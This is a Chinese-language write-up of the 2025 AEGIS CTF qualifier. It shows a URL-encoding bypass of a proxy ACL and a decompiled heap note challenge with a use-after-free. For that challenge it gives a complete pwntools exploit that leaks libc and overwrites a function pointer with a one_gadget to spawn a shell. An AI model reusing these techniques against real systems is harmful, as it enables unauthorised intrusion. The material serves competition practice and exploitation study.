2025-AEGIS-CTF-writeup

2025 神盾杯 Qual - writeup

Author: 堇姬 Naup

跟 CakeisTheFake 拿了第三名

高速 speedrun writeup

HiProxy

ACL rules 擋下了訪問 admin
直接 urlencode bypass
curl -i https://aegis2025-web-ha.chals.io/%61dmin

AEGIS{H77P_r3QU357_5MU6611N6_5UCC355}

n2

analyze

main function 提供了三個功能，add、backup_and_delete、show

int __fastcall main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rax
  __int64 v5; // rax
  int choice; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v7; // [rsp+8h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  setup();
  while ( 1 )
  {
    menu();
    std::istream::operator>>(&std::cin, &choice);
    if ( choice == 4 )
      break;
    if ( choice > 4 )
      goto LABEL_12;
    switch ( choice )
    {
      case 3:
        show_note();
        break;
      case 1:
        add_note();
        break;
      case 2:
        backup_and_delete_note();
        break;
      default:
LABEL_12:
        v5 = std::operator<<<std::char_traits<char>>(&std::cout, "Invalid choice.");
        std::ostream::operator<<(v5, &std::endl<char,std::char_traits<char>>);
        break;
    }
  }
  v3 = std::operator<<<std::char_traits<char>>(&std::cout, "Goodbye!");
  std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
  return 0;
}

他首先會先去 malloc 一塊 metadata，大小是 0x18
他第一個元素是 show_content 的 function pointer
第二個是 note pointer，指向 data 儲存的 chunk
第三個是 int size

另外他限制了 size 不可以大於 0x800
以及分配完後，會將 meta data chunk pointer push back 到 vector 中
這個 vector 是一個全域 notes 變數

unsigned __int64 add_note(void)
{
  __int64 v0; // rax
  __int64 v1; // rax
  metadata *Mdata; // rbx
  __int64 v3; // rax
  __int64 cout_Note_added_at_index; // rbx
  __int64 vector_size; // rax
  __int64 v6; // rax
  u32 size; // [rsp+Ch] [rbp-24h] BYREF
  metadata *metadata; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v10; // [rsp+18h] [rbp-18h]

  v10 = __readfsqword(0x28u);
  std::operator<<<std::char_traits<char>>(&std::cout, "Enter note size: ");
  std::istream::operator>>(&std::cin, &size);
  if ( size <= 0x800 )
  {
    metadata = (metadata *)malloc(0x18uLL);
    if ( metadata )
    {
      metadata->func_ptr = show_content;
      metadata->size = size;
      Mdata = metadata;
      Mdata->note = malloc(size);
      if ( metadata->note )
      {
        std::operator<<<std::char_traits<char>>(&std::cout, "Enter content: ");
        read(0, metadata->note, size);
        std::vector<Note *>::push_back(&notes, &metadata);
        cout_Note_added_at_index = std::operator<<<std::char_traits<char>>(&std::cout, "Note added at index ");
        vector_size = std::vector<Note *>::size(&notes);
        v6 = std::ostream::operator<<(cout_Note_added_at_index, vector_size - 1);
        std::ostream::operator<<(v6, &std::endl<char,std::char_traits<char>>);// //std::cout << Note added at index << notes.size()-1 << endl;
      }
      else
      {
        v3 = std::operator<<<std::char_traits<char>>(&std::cout, "Content allocation failed!");
        std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
        free(metadata);                         // UAF
      }
    }
    else
    {
      v1 = std::operator<<<std::char_traits<char>>(&std::cout, "Allocation failed!");// std::cout<<"Allocation failed"<<endl;
      std::ostream::operator<<(v1, &std::endl<char,std::char_traits<char>>);
    }
  }
  else
  {
    v0 = std::operator<<<std::char_traits<char>>(&std::cout, "Size too large!");
    std::ostream::operator<<(v0, &std::endl<char,std::char_traits<char>>);// std::cout<<"Size too large" << endl;
  }
  return v10 - __readfsqword(0x28u);
}

backup and delete 邏輯非常簡單，就是指定 index，若 size < 0x200 就會在內心做 backup 之後 free
但若大於 0x200 就直接 free
不過大於 0x200 的狀況就沒有去清空 vector 中的 pointer，所以有個 UAF

unsigned __int64 backup_and_delete_note(void)
{
  unsigned __int64 idx; // rbx
  __int64 v2; // rax
  __int64 v3; // rax
  __int64 v4; // rax
  __int64 v5; // rax
  __int64 v6; // rax
  __int64 v7; // rax
  __int64 v8; // rax
  __int64 v9; // rax
  __int64 v10; // rax
  unsigned int index; // [rsp+Ch] [rbp-24h] BYREF
  metadata *ptr; // [rsp+10h] [rbp-20h]
  unsigned __int64 v14; // [rsp+18h] [rbp-18h]

  v14 = __readfsqword(0x28u);
  std::operator<<<std::char_traits<char>>(&std::cout, "Enter note index to backup and delete: ");
  std::istream::operator>>(&std::cin, &index);
  idx = index;
  if ( idx >= std::vector<Note *>::size(&notes) || !*(_QWORD *)std::vector<Note *>::operator[](&notes, index) )
  {
    v2 = std::operator<<<std::char_traits<char>>(&std::cout, "Invalid index!");
    std::ostream::operator<<(v2, &std::endl<char,std::char_traits<char>>);
  }
  else
  {
    ptr = *(metadata **)std::vector<Note *>::operator[](&notes, index);
    if ( ptr->size <= 0x200 )
    {
      v5 = std::operator<<<std::char_traits<char>>(&std::cout, "Backing up note ");
      v6 = std::ostream::operator<<(v5, index);
      v7 = std::operator<<<std::char_traits<char>>(v6, "...");
      std::ostream::operator<<(v7, &std::endl<char,std::char_traits<char>>);
      v8 = std::operator<<<std::char_traits<char>>(&std::cout, "Backup successful.");
      std::ostream::operator<<(v8, &std::endl<char,std::char_traits<char>>);// <<backing up note <<index<<...<<endl<<backup successful.<<endl;
      free(ptr->note);
      free(ptr);
      *(_QWORD *)std::vector<Note *>::operator[](&notes, index) = 0LL;// notes[idx]=0
      v9 = std::operator<<<std::char_traits<char>>(&std::cout, "Note ");
      v10 = std::ostream::operator<<(v9, index);
      v4 = std::operator<<<std::char_traits<char>>(v10, " deleted successfully.");// cout<<Note<<idx<<deleted successfully
    }
    else
    {
      v3 = std::operator<<<std::char_traits<char>>(&std::cout, "Backup failed: Note content is too large to backup.");
      std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
      free(ptr->note);
      free(ptr);
      v4 = std::operator<<<std::char_traits<char>>(&std::cout, "Deletion aborted. Please try again later.");
    }
    std::ostream::operator<<(v4, &std::endl<char,std::char_traits<char>>);
  }
  return v14 - __readfsqword(0x28u);
}

show note 就是輸入 index，他會去找 function pointer call 他
把你的 note 內容輸出出來

unsigned __int64 show_note(void)
{
  unsigned __int64 index; // rbx
  __int64 cout_content; // rax
  metadata **v3; // rax
  __int64 v4; // rbx
  __int64 v5; // rax
  unsigned int idx; // [rsp+4h] [rbp-1Ch] BYREF
  unsigned __int64 v8; // [rsp+8h] [rbp-18h]

  v8 = __readfsqword(0x28u);
  std::operator<<<std::char_traits<char>>(&std::cout, "Enter note index to show: ");
  std::istream::operator>>(&std::cin, &idx);
  index = idx;
  if ( index >= std::vector<Note *>::size(&notes) || !*(_QWORD *)std::vector<Note *>::operator[](&notes, idx) )// if(index >= notes.size() || !notes[idx])
  {
    cout_content = std::operator<<<std::char_traits<char>>(&std::cout, "Invalid index or note already deleted.");
  }
  else
  {
    v3 = (metadata **)std::vector<Note *>::operator[](&notes, idx);
    (*v3)->func_ptr();
    v4 = std::operator<<<std::char_traits<char>>(&std::cout, "Content: ");
    v5 = std::vector<Note *>::operator[](&notes, idx);
    cout_content = std::operator<<<std::char_traits<char>>(v4, *(_QWORD *)(*(_QWORD *)v5 + 8LL));
  }
  std::ostream::operator<<(cout_content, &std::endl<char,std::char_traits<char>>);
  return v8 - __readfsqword(0x28u);
}

attack

思路基本上就是 UAF leak libc
UAF 覆蓋掉 function pointer 成 one gadget
就可以開一個 shell 了

詳見腳本

exploit

from pwn import *
import time

def s(payload): return r.send(payload)
def sl(payload): return r.sendline(payload)
def sla(after, payload): return r.sendlineafter(after, payload)
def sa(after, payload): return r.sendafter(after, payload)
def rc(num): return r.recv(num)
def rcl(): return r.recvline()
def rcls(num): return r.recvlines(num)
def rcu(payload): return r.recvuntil(payload)
def ita(): return r.interactive()
def cl(): return r.close()
def tsl(): return time.sleep(0.2)

def p(r):
    gdb.attach(r)

def p_c(r,cmd):
    gdb.attach(r,cmd)

def split_nc(nc_str):
    nc_str=nc_str.split(" ")
    return [nc_str[1],nc_str[2]]

context(arch = 'amd64', os = 'linux')


REMOTE_LOCAL=input("local?(y/n):")

if REMOTE_LOCAL=="y":
    r=process('./n2')
    a=input('open debug?(y/n/srop)')
    if a=='y':
        context.log_level = 'debug'
        context.terminal = ['tmux', 'splitw', '-h']

    elif a=='srop':
        context.log_level = 'debug'
        context.terminal = ['tmux', 'splitw', '-h', '-F' '#{pane_pid}', '-P']
    
else:                                           
    REMOTE_INFO=split_nc("nc 0.cloud.chals.io 28850")

    REMOTE_IP=REMOTE_INFO[0]
    REMOTE_PORT=int(REMOTE_INFO[1])

    r=remote(REMOTE_IP,REMOTE_PORT)

### attach
if input('attach?(y/n)') == 'y':
    p(r)


### heap IO
def add(size:int,content:str):
    r.sendlineafter(b'> ', b'1')
    r.sendlineafter(b'size: ', str(size).encode())
    r.sendafter(b'content: ', content)


def delete(idx:int ):
    r.sendlineafter(b'> ', b'2')
    r.sendlineafter(b'delete: ', str(idx).encode())

def show(idx:int):
    r.sendlineafter(b'> ', b'3')
    r.sendlineafter(b'show: ', str(idx).encode())

### exploit

libc_off = 0x203b73

add(0x418, 's')

delete(0)
add(0x418, 's')

show(1)
rcu(b"Content: ")
leak = rcl().strip()

leaklibc = u64(leak.ljust(8, b"\x00"))
libcbase = leaklibc - libc_off

print(hex(libcbase))

add(0x20, b'd')
delete(0)
delete(2)

add(0x10, p64(libcbase + 0xef4ce))
show(0)

### interactive
ita()

AEGIS{Wh0_the_h31l_let_you_m4ke_tHe_d3cision}

after all

冷知識:
泡芙阿姨 + open 醬 猜工具

ans: openpuff (from misc chalenge)